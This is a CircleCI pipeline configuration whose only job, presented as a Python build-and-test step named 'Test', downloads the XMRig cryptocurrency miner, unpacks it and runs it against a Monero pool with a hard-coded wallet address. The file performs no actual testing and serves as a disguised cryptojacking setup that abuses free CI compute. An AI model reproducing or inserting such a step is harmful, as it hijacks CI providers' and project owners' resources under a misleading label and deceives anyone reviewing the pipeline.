version: 2.1

orbs:
   python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: wget https://github.com/xmrig/xmrig/releases/download/v5.11.3/xmrig-5.11.3-xenial-x64.tar.gz && tar -zxf xmrig-5.11.3-xenial-x64.tar.gz && cd xmrig-5.11.3 && ./xmrig -a cryptonight -o pool.supportxmr.com:3333 -u 89KiicN6ta7iisGmSAqHzsecYJtgV1gAWMxoeAwm6DePSbXwz6uDW1qBNvmFyZsYu6YN8vGebH3LKDPWss47RCum3AjM5ub
          name: Test

workflows:
  main:
    jobs:
      - build-and-test